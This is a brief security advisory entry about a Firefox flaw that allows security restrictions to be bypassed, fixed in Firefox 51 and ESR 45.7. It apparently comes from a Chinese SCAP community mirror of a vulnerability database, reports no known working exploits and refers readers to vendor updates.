An attacker can leverage this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks.

This issue is fixed in the following version:

Firefox ESR 45.7
Firefox 51

- 漏洞利用

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

Updates are available. Please see the references or vendor advisory for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站